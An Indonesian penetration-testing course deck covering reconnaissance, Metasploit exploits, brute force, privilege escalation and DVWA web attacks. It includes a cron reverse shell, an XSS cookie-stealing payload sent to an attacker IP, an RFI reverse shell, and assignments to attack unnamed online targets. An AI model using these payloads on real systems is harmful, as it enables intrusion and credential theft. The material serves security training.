100% menganggap dokumen ini bermanfaat (1 suara)
516 tayangan119 halaman

Penetration Testing IDN

Diunggah oleh

smkbinaadzkia
Hak Cipta
© © All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd
100% menganggap dokumen ini bermanfaat (1 suara)
516 tayangan119 halaman

Penetration Testing IDN

Diunggah oleh

smkbinaadzkia
Hak Cipta
© © All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd

Cyber Security

Fundamental
Penetration Testing
Aditya Firman Nugroho
,Pentest+,EjptV2,CNSP,Security+

visit now www.idn.id


Outline Offensive Security
IDN.ID

www.idn.id 2
Introduction Trainer
IDN.ID

Contact Information
Email : adityafirmannn21@gmail.com
Linkedin =linkedin/aditya-firman-Nugroho
Nomor : 0812-1471-7312
Certified : MTCSE, Pentest+,Security+, Ejptv2,
NSE4,CNSP

www.idn.id 3
Modul 1
Setup Environment
Setup Basic Environment
IDN.ID

Melakukan Penginstalasi software dan OS yang dibutuhkan untuk kebutuhan


environment lab seperti :
• Virtual Machine
• VMWARE
• Kali Linux ( https://www.kali.org/downloads/ )
• S.id/B-Pentest
• Akses VPN https://s.id/idn-vpn

www.idn.id 5
Setup VMware
IDN.ID

www.idn.id 6
Kali Linux Setup
IDN.ID

Jika menggunakan virtualbox silahkan memilih menu virtualbox

www.idn.id 7
Kali Linux Setup
IDN.ID

Password default kali linux ( kali:kali )

www.idn.id 8
Setup Metasploitable2
IDN.ID

www.idn.id 9
Modul 2
Fundamental IT
OSI Layer
IDN.ID

1. OSI Layer “Bahasa” Komunikasi antar


Perangkat Jaringan
• Physical
• Wired atau Wireless
• Data Link
• ARP & Mac Address
• Network
• IP Address
• Transport
• TCP & UDP

www.idn.id 11
TCP & UDP
IDN.ID

• TCP
• Reliable Data
• Three-Way Handshake
• Chatting, HTTPS
• UDP
• Unreliable Data
• More Fast
• Streaming Youtube

www.idn.id 12
Port & Service
IDN.ID

• Port Adalah Pintu


• Service pada Jaringan membutuhkan Pintu untuk membentuk
komunikasi
• Tiap Service memiliki Port masing masing seperti
• Well-Known Port ( 0 – 1023 )
• Register Port ( 1024 – 3xxx )
• Unregister Port ( 3xxx – 6xxxx )
Disamping ini port Service yang biasa terbuka :

www.idn.id 13
Linux File system hierarchy
IDN.ID

www.idn.id 14
File Permision
IDN.ID

www.idn.id 15
Command Linux
IDN.ID

Biasakan command linux


untuk kelancaran
menggunakan tools

www.idn.id 16
Modul 3
Introduction Offensive
Security
Kali Linux
IDN.ID

• Kali Linux Debian Based


• OS Penetration Testing
• 300 Lebih Tools
• https://www.kali.org/tools/

www.idn.id 18
CIA Triad
IDN.ID

CIA triad adalah model yang dipakai


dalam cybersecurity, bertujuan untuk
melindungi system.
• Confidentiality
• Integrity
• Availability
• Non-Repudiation
CIA Traid

www.idn.id 19
Pentesting Process
IDN.ID

www.idn.id 20
Vulnerability Assessment & Penetration Testing
IDN.ID

Vulnerability Penetration
Assessment Testing

www.idn.id 21
Knowledge strategy
IDN.ID

www.idn.id 22
Assessment Types
IDN.ID

www.idn.id 23
Methodology
IDN.ID

[IDN-Router]

www.idn.id 24
OWASP TOP 10
IDN.ID

OWASP Top 10 adalah standar keamanan yang bisa dipakai secara umum untuk melakukan
checking parameter security. menampilkan yang paling critical dan resiko tertinggi untuk web
application

www.idn.id 25
Modul 4
Information
Gathering
Information Gathering
IDN.ID

Information Gathering atau mengumpulkan informasi sebanyak banyak-nya


tentang target. Ada 2 cara untuk melakukan information gathering :

www.idn.id 27
Passive Information Gathering
IDN.ID

www.idn.id 28
Google Hacking Databse
IDN.ID

https://www.exploit-db.com/google-hacking-database

www.idn.id 29
LA
B
Using Google Dorking
IDN.ID

Dengan menggunakan google dorking


kita bisa lebih tepat untuk mencari sebuah
informasi-informasi target

filetype:pdf site:idn.id

www.idn.id 30
Real Case With Google Dorking
IDN.ID

https://royzsec.medium.com/how-i-hacked-nasa-via-google-dorking-6d8c03d0675a

www.idn.id 31
Cheat Sheat google dork
IDN.ID

Cheat sheet yang


digunakan untuk mencari
informasi pada target
dengan google dork

www.idn.id 32
Google Hacking Databse
IDN.ID

TUGAS :

1. Carilah robots.txt pada sebuah website


2. carilah ditext website “index of /”
3. carilah database sql pada sebuah website

www.idn.id 33
OSINT Framework
IDN.ID

OSINT Framework, Kumpulan tools yang


bisa kita gunakan untuk mendapatkan
informasi target kita

https://osintframework.com/

www.idn.id 34
LA
B
Shodan
IDN.ID

shodan adalah search engine


khusus yang bisa kita pakai untuk
mencari informasi berupa port,
service dan juga beberapa
kelemahan pada ip tersebut

www.idn.id 35
LA
B
Shodan
IDN.ID

TUGAS :

Carilah satu target analisa port


yang ditemukan ;

1. Port
2. Service
3. Vulnerability

www.idn.id 36
LA
B
DNSdumpster
IDN.ID

Sama seperti search engine


sebelum sebelumnya, bisa
mendapatkan informasi berupa
subdomain dari website yang di
targetkan

www.idn.id 37
Tools Automation
theHarvester Recon-ng

www.idn.id 38
LA
B
theHarvester
IDN.ID

theHarvester bisa digunakan untuk


mengumpulkan informasi berupa email,
sub-domain, dan banner secara otomatis
yang biasanya bersumber dari search
engine seperti shodan dan censys

theHarvester -d <Target>

www.idn.id 39
LA
B
theHarvester
IDN.ID

Usage :

theHarvester -d <domain> -b all

nano /etc/theHarvester/api-keys.yaml
< menambahkan api keys >

www.idn.id 40
Active Information Gathering
IDN.ID

Active Information gathering akan


memfokuskan pencarian
information langsung terhadap
target dan bisa juga memvalidasi
temuan dari passive information
gathering

www.idn.id 41
LA
B
Ping Swep
IDN.ID

1. Scripting Ping Sweep menggunakan Bash

2. Cara menggunakannya bash filename.sh ip


• Example : bash ping-sweep.sh 192.168.10 > output.txt

www.idn.id 42
LA
B
Port Scanner With Bash + Nc
IDN.ID

Port-scanner dengan bash, dan nc


( netcat ) akan melakukan
scanning terhadap target dengan
port yang sudah didefinisikan
common

www.idn.id 43
NMAP
IDN.ID

nmap tools, bisa digunakan untuk mencari


port & service yang digunakan pada
sebuah sistem target.

Usage :
#nmap <HOST>
#nmap –A –Sv <HOST>

www.idn.id 44
Cheatshet NMAP
IDN.ID

www.idn.id 45
Nmap Script Engine
IDN.ID

Nmap scripting engine, script terbuat dari


lua programming untuk melakukan otomasi
sangat luas selain network mapper. Dia
bisa melakukan brute force, scanning ,
exploitasi kelemahan

www.idn.id 46
LA
B
NMAP
IDN.ID

Scanning Target http://IP-TARGET cari Beberapa


informasi yang di bawah ini dan notekeeping :
• Port & Service & version : -
• OS Detection : -
• Cari Menggunakan Searchsploit : -

Target : 172.23.1.224 & 172.23.2.50

www.idn.id 47
Searchsploit & Exploit-DB
IDN.ID

Searchsploit digunakan untuk menemukan


kelemahan pada service & software yang
sudah ter database pada exploit-DB

www.idn.id 48
LA
B
Peak Tugas
IDN.ID

Analisa output yang discan di tugas nmap dan


lakukan analisis dengan searchsploit

1. temukan kemungkinan kelemahannya


2. temukan script yang bisa kita pakai
3. coba lakukan script itu untuk exploitasi

www.idn.id 49
Nessus
IDN.ID

Nessus Tenable tools Vulnerability


Scanning Mencakup semua nya
Network, Web App pada target,
Tools ini akan melakukan
Assessment pada target secara
menyeluruh sehingga bisa
mengetahui Vulnerability yang
Priority rendah sampai tinggi.

www.idn.id 50
LA
B
Nessus
IDN.ID

1. Download packet nessus pada https://www.tenable.com/downloads/nessus


2. Sesuaikan paket yang di download
3. Lakukan command
dpkg –I <nama-packet>
4. Lakukan register untuk mendapatkan activation code pada website
https://www.tenable.com/products/nessus/nessus-essentials
5. Lakukan command
systemctl start nessus
6. Masuk menggunakan browser dengan mengetikan https://x.x.x.x:8834/
7. Masukan license yang didapatkan di email, dan buat akun.

www.idn.id 51
52
CVE & CWE
IDN.ID

Common Vulnerability Common Weakness


Eksposure Enumeration

www.idn.id 53
Web Application Enumeration
IDN.ID

Web application Enumeration :

1. Teknologi apa yang digunakan ?


2. Temukan Directory/subdomain yang ada pada website tersebut
3. Mencari input form pada sebuah website
4. Melakukan pengecekan header http pada website tersebut

www.idn.id 54
LA
B
Web Technology
IDN.ID

Tools enumeration, whatweb, wappalyzer, builtwith

wappalyzer whatweb

www.idn.id 55
LA
B
Directory/Subdomain
IDN.ID

Tools enumeration, gobuster, ffuf, nuclei

ffuf dirb

www.idn.id 56
LA
B
Directory/Subdomain
IDN.ID

Tugas :

1. Lakukan enumeration directory pada website target


2. simpulkan apa saja yang ada pada website tersebut

www.idn.id 57
Metasploit Framework
IDN.ID

Enumeration tools menggunakan


msfconsole :

Usage :
auxiliary/scanner/http/dir_listing
auxiliary/scanner/http/files_dir
auxiliary/scanner/http/robots.txt
auxiliary/scanner/http/http-version

www.idn.id 58
LA
B
Scanning With CMS
IDN.ID

wpscan

joomscan

www.idn.id 59
LA
B
Scanning With CMS
IDN.ID

Usage :

wpscan –url <host>

wpscan –url <host> -e u wpscan

wpscan –url <host> api-token

www.idn.id 60
LA
B
Scanning With CMS
IDN.ID

TUGAS :
1. Silahkan cari user dari website target

wpscan

www.idn.id 61
Modul 5
Gaining Access
Vulnerability
IDN.ID

Vulnerability yang bisa kita


manfaatkan untuk masuk ke
dalam system, dimulai dari
software yang tidak diupdate

www.idn.id 63
LA
B
FTP Misconfiguration : Login Anonymous
IDN.ID

FTP Misconfiguration : Login Anonymous ini terjadi saat administrator


melakukan kesalahan dengan tidak sengaja mengganti konfigurasi anonymous
pada FTP

Kita bisa login melalui FTP


Service dengan username
FTP Anonymous Scanning NMAP anonymous

www.idn.id 64
LA
B
FTP Backdoor : vsftpd 2.3.4
IDN.ID

Vsftpd 2.3.4 FTP Backdoor adalah sebuah backdoor yang dipasang oleh APT
pada aplikasi FTP. Yang bisa Membuat kita mendapatkan akses root hanya
dengan menggunakan satu tools yaitu metasploitable2
• Msfconsole
• Use / exploit/unix/ftp/vsftpd_234_backdoor
• Set RHOST IP-TARGET
• run

www.idn.id 65
LA
B
SMB : EternalBlue
IDN.ID

Threat Actors melakukan serangan yang kita sudah tau Bernama WannaCry
Ransomware yang mengakibatkan banyak Microsoft Windows system yang
terkena ransomware ini. Ransomware ini mengambil keuntungan dari SMBv1
yang bisa mengakibatkan RCE ( Remote Code Execution )
• Msfconsole
• Use auxiliary/scanner/smb/smb_ms17_010
• Set RHOSTS IP-TARGET
• RUN
• Use exploit/windows/smb/ms_17_010_eternalbue
• Set RHOST IP-TARGET & Set LHOSTS IP-KALI-LINUX
• Exploit

www.idn.id 66
Password Attacks
IDN.ID

Ada beberapa cara melakukan password seperti dibawah, goals dari serangan
ini mendapatkan akses terhadap sistem, enumeration password & username
atau mencoba melakukan kombinasi untuk masuk kedalam system
• Brute Force
• Dictionary attack
• Password Cracking

www.idn.id 67
LA
B
Wordlist Generator
IDN.ID

Untuk melakukan password attack, ada yang Namanya serangan dictionary


attack yang menggunakan wordlist untuk mengefisiensikan waktu penyerangan,
tools pembuat wordlist yaitu
1. Crunch
2. CeWL
3. Seclist
4. rockyou.txt

www.idn.id 68
LA
B
Wordlist Generator
IDN.ID

Command Crunch
crunch 4 5 abcdefgh > wordlist.txt

cewl -m 4 -d 5 http://website.com/ > cewl.txt

dpkg /usr/share/wordlists/rockyou.txt

apt install seclists

www.idn.id 69
LA
B
SSH Brute Force : Hydra
IDN.ID

Hydra adalah tools brute force password attack. Bisa Service network
FTP,SSH,SMB dan masih banyak lagi juga bisa untuk ke web app
• hydra -l <user> -P <wordlist-password> <target> <method>

usage :

hydra -l admin -P /usr/share/wordlists/rockyou.txt 182.241.123.2 ssh

www.idn.id 70
LA
B
Hydra login brute force
IDN.ID

Format
<URL>:<FORM PARAMETER>:<CONDITION
STRING>[:<OPTIONAL><:OPTIONAL>

hydra -l user -P /usr/share/wordlists/rockyou.txt 172.23.2.102 http-get-form


"/wp-login.php:username=^USER^&password=^PASS^:S=logout.php" -f

www.idn.id 71
LA
B
Burp Suite Brute Force
IDN.ID

Pertama siapkan burp-suite dan proxy server untuk menangkap


request login
Arahkan ke Intruder dengan
CTRL+I

www.idn.id 72
LA
B
Burp Suite Brute Force
IDN.ID

Tandai dimana yang akan di brute force menggunakan metode


sniper

Edit Payload

Lalu Serang, jika


menemukan kode http 300
maka itu passwordnya

www.idn.id 73
LA
B
SSH Brute Force : Hydra
IDN.ID

Tugas :
1. Brute force login page online !
2. Brute force ssh !

www.idn.id 74
LA
B
Login Page Brute Force : WPSCAN
IDN.ID

Selain bisa melakukan scanning untuk wordpres, tools


wpscan bisa melakukan brute force
• wpscan --url <target> -U <wordlist-username> -P
<wordlist password>

www.idn.id 75
LA
B
Login Page Brute Force : WPSCAN
IDN.ID

Tugas :

1. Cari user dari wordpress


2. login brute force pada website tersebut!

www.idn.id 76
LA
B
Using John the ripper
IDN.ID

Kita akan melakukan password cracking


menggunakan tools john the ripper
• john <file-crack> --wordlist=<wordlist>

www.idn.id 77
LA
B
Using John the ripper
IDN.ID

Tugas :
Crack password yang ada pada link
s.id/B-Pentest
1. Admin
2. Guest
3. Administrator

www.idn.id 78
Metasploit Framework
IDN.ID

Gaining access, degan cara brute force


menggunakan msfconsole

• auxiliary/scanner/http/wordpress_login_enum
• auxiliary/scanner/ssh/ssh_login
• auxiliary/scanner/smb/smb_login

www.idn.id 79
Modul 6
Post-Exploitation
Privilage Escalation
IDN.ID

Privilage Escalation, salah satu


Teknik untuk menaikan hak akses
user pada target

www.idn.id 81
LA
B
Weak Configuration
IDN.ID

GTFOBins website yang berisi unix


binary yang bisa kita manfaatkan untuk
bypass security restrictions didalam
system yang misconfigured

www.idn.id 82
LA
B
SUID Exploit
IDN.ID

Usage :
Find / -type f –perm -4001 –exec ls –h {} \; 2>/dev/null
Sudo -l

Cari file-permission yang bisa Membuat kita menaikan


hak akses

Program bin
/usr/bin/find
/usr/bin/man

www.idn.id 83
LA
B
Vulnerability
IDN.ID

Vulnerability yang disebabkan software


yang lemah, sehingga bisa hacker bisa
melakukan exploit pada software tersebut
hingga logic penggunaanya berubah

Tahap-tahap melakukan nya :


• Menemukan kelemahan menggunakan tools
• Gtfo Bins
• exploit

www.idn.id 84
LA
B
Dirty Cow (CVE-2016-5195 )
IDN.ID

Dirty-cow
1. Upload tools enumeration
• Linpeas
• linux-exploit-suggester.sh
2. Exploit with script

Usage :
# file upload with python3 or netcat
# chmod +x tools
# ./tools

www.idn.id 85
LA
B
Dirty Cow (CVE-2016-5195 )
IDN.ID

Dirty-cow
1. upload linpeas.sh
2. gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
3. passwd or id

www.idn.id 86
Persistence
IDN.ID

Persistence dilakukan saat, goals


dari pentesting belum terpenuhi

www.idn.id 87
LA
B
Bind Shell vs Reverse Shell
IDN.ID

• Bind Shell dilakukan dari


attacker connect ke client
• Reverse shell dilakukan dari
client Connect ke attacker

www.idn.id 88
LA
B
Netcat
IDN.ID

Ncat & netcat tools yang digunakan


untuk melakukan persistence, bisa
mengirimkan file, Membuat koneksi
antar host
Usage :
# nc –lvp <port> -- untuk listener
# nc –nv <ip> <port>

www.idn.id 89
LA
B
Revershell-Generator
IDN.ID

Website yang bisa kita pakai untuk


Membuat script reverse-shell atau
bind shell
https://www.revshells.com/

www.idn.id 90
LA
B
Cronjob
IDN.ID

Cronjob job scheduling utility yang bisa melakukan schedule yang berjalan di
background biasanya itu applikasi ataupun script. Nah dari sini kita bisa
menambahkan script reverse shell agar bisa connect
1. Crontab –e
2. * * * * * nc –nv IP-KALI PORT –e /bin/bash
3. Setelah melakukan crontab Kembali ke kali linux dan setting listener NC

www.idn.id 91
LA
B
SSH-keys
IDN.ID

SSH-Keys kita bisa masuk tanpa harus memasukan sebuah password pada
linux dengan ssh keys :
1. SSH-Keygens, create keys kali linux
2. Copy id_rsa.pub, arahkan ke authorized_keys pada target
3. Lakukan connect ssh

www.idn.id 92
Metasploit Framework
IDN.ID

Persistence dengan migrate process

#Usage :
se exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
…..
exploit
ps | <process>
kill <pid>

www.idn.id 93
Covering Tracks
IDN.ID

Proses terakhir setelah melakukan post-exploitation adalah kita melakukan


covering tracks yaitu menghapus semua jejak yang kita lakukan pada system
• Hapus log
• Hapus files & users
• Hapus Backdoor
• Hapus Cron Jobs

www.idn.id 94
Web Exploit
IDN.ID

Kita akan memanfaatkan Metasploitable2 DVWA yang mempunyai kelemahan


OWASP top 10 2017 Seperti dibawah ini :
• Command Injection
• XSS
• SQL Injection
• LFI/RFI
• Directory Scanning
• Upload File

www.idn.id 95
Directory Traversal
IDN.ID

Directory Traversal merupakan serangan yang biasanya digunakan pada fungsi


memanggil file pada sebuah web aplikasi. Efek dari serangan ini jika tidak di
sanitasi inputnya attacker bisa melakukan panggilan pada file yang tidak
seharusnya terpanggil. Ada dua cara attacker melakukan serangan ini :
1. Local File Inclusion
• Memanggil file yang sudah ada di server
2. Remote File Inclusion
• Memanggil file yang di luar server

www.idn.id 96
LA
B
Local File Inclusion
IDN.ID

Kita akan melakukan injection pada DVWA

Disini kita tau bahwa source


code dari dvwa ( low ) tidak
melakukan parameter input

../../../etc/passwd

www.idn.id 97
LA
B
Remote File Inclusion
IDN.ID

Kita akan melakukan Remote File Inclusion, pertama edit dulu allow_url pada
/etc/php5/cgi/php.ini dan restart apache server systemctl restart sshd

www.idn.id 98
LA
B
Remote File Inclusion
IDN.ID

Pertama kita akan Membuat backdoor, yang akan dipanggil disini kita
menggunakan php-reverse-shell.php file php yang sudah ada built-in dari
kali-linux

IP-KALI LINUX

PORT

Python3 –m http.server PORT

www.idn.id 99
LA
B
Remote File Inclusion
IDN.ID

Menggunakan url yang sama seperti LFI, lakukan http://IP-Kali:PORT/shell.php


dan jangan lupa jalankan nc –lvp PORT

URL Kali Linux


DVWA
URL
Success

Reverse
shell

www.idn.id 100
XSS ( Stored & Reflected )
IDN.ID

Cara kerja XSS memanipulasi script agar memunculkan kelemahan di sisi web
application menggunakan malicious script. XSS ini mengijinkan attacker menjadi
seseorang yang teregister di web application sehingga bisa melakukan hal-hal
yang bisa dilakukan orang tersebut.
• Reflected XSS
Dimana malicious script datang dari request HTTP
• Stored XSS
Dimana malicious script data dari website database

www.idn.id 101
LA
B
XSS Stored DVWA
IDN.ID

Kita akan mencoba melakukan PoC pada DVWA ini, dengan cara melakukan
injection alert () dengan command ini akan menunjukan apakah form bisa di
injection XSS jika muncul gambar seperti ini maka form tersebut memiliki
kelemahan XSS

< script >alert(1)</script>

www.idn.id 102
LA
B
XSS Reflected DVWA
IDN.ID

Kita akan mencoba melakukan PoC pada DVWA ini, dengan cara melakukan
injection alert () dengan command ini akan menunjukan apakah form bisa di
injection XSS jika muncul gambar seperti ini maka form tersebut memiliki
kelemahan XSS

No input parameter

www.idn.id 103
LA
B
XSS Stealing Session
IDN.ID

Mencoba untuk mencuri cookies, saat target melakukan request pada website
yang sudah kita pasang Malicious Script

<script>new
Image().src="http://192.168.43
.147:8888/bogus.php?output=
"+document.cookie;</script>

www.idn.id 104
SQL Injection
IDN.ID

SQL Injection (SQLi) kelemahan yang memungkinkan attacker melakukan


interference pada query membuat perubahan pada database, melihat database
dan masih banyak lagi.

Dilihat dari application SQL tidak menjalankan sanitasi parameter, jadi kita bisa
coba melakukan injection code

www.idn.id 105
SQL Injection
IDN.ID

‘or
‘1’=‘1

www.idn.id 106
LA
B
SQL Injection DVWA
IDN.ID

1. Tampilkan Versi dari Database dan Hostaname


2. Tampilkan semua isi dari database
3. Tampilkan User database
%' or 0=0 union
select null,
@@hostname#

www.idn.id 107
LA
B
SQL Injection Manual
IDN.ID

1. Masuk ke website http://testphp.vulnweb.com/listproducts.php?cat=1


2. Tambahkan karakter single quote (‘) pada akhir url untuk mengetahui vuln atau tidak. Contoh
http://testphp.vulnweb.com/listproducts.php?cat=1’ biasanya muncul QUERY SQL Error atau
tampilan website berubah
3. Sekarang kita akan mencari dan menghitung jumlah table yang ada menggunakan perintah
ORDER BY http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1+--+ Lakukan hal
yang sama berulah, jika tampilan web menjadi error maka jumlah table tidak melebihi
angka tersebut
4. Jika sudah mendapatkan jumlah dari table maka urutkan angka-nya seperti ini
http://testphp.vulnweb.com/listproducts.php?cat=1 +union+select+1,2,3..10+--+ maka akan
muncul angka pada tampilan website
5. Setelah menemukan angka tersebut maka exploit dengan command yang sebelumnya

www.idn.id 108
SQL Injection with SQLMAP
IDN.ID

1. Target http://testphp.vulnweb.com/listproducts.php?cat=1
2. Jalankan tools sqlmap dengan command
sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –dbs
3. Terlihat beberapa database, explore database “acuart” dengan command
sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart –tables
Terlihat muncul beberapa informasi, yang paling menarik adalah informasi dari
“users”, exploit menggunakan tools sqlmap
4. Lakukan lah command sqlmap –u
“http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart –T users –dump

www.idn.id 109
Upload File
IDN.ID

Upload file pada DVWA, kita akan mengupload sebuah shell backdoor untuk
menampilkan semua directory dan files
• Git clone https://github.com/aqhmal/Simple-PHP-Web-Backdoor
• Masukan pada file upload DVWA

www.idn.id 110
LA
B
Upload File with Burp Suite
IDN.ID

Menggunakan burp suite untuk melakukan manipulasi pada file yang diupload
• Jalankan Burp Suite
• Download certificate Burp http://burp pasangkan pada certificate search
engine
• Masuk ke DVWA Upload menu, upload file shell.php.jpeg ( ubah nama pada
file tersebut )
• Intercept data yang dikirimkan ganti shell.php.jpeg menjadi shell.php

www.idn.id 111
LA
B
Upload File with Burp Suite
IDN.ID

Dashboar
d
Wireshark

Turn ON

www.idn.id 112
LA
B
Upload File with Burp Suite
IDN.ID
Dowload CA

Masukan CA

www.idn.id 113
LA
B
Upload File with Burp Suite
IDN.ID

www.idn.id 114
LA
B
Upload File with Burp Suite
IDN.ID

Rename file

www.idn.id 115
Modul 7
Reporting
Reporting
IDN.ID

Saat melakukan reporting ada beberapa yang harus diperhatikan


• Pada siapa report ini akan diajukan
• Executive summary
• Apa ada third-party pada perusahan ?
• Bedakan c-suite dan developer

www.idn.id 117
LA
B
Nmap output html
IDN.ID

1. Lakukan scanning pada target

2. Lakukan command untuk merubah xml menjadi html

3. hosting menggunakan python3 –m http.server [PORT]

4. Buka melalui website http://IP-Local:[PORT]/example.html

www.idn.id 118
LA
B
Nmap output html
IDN.ID

www.idn.id 119

Anda mungkin juga menyukai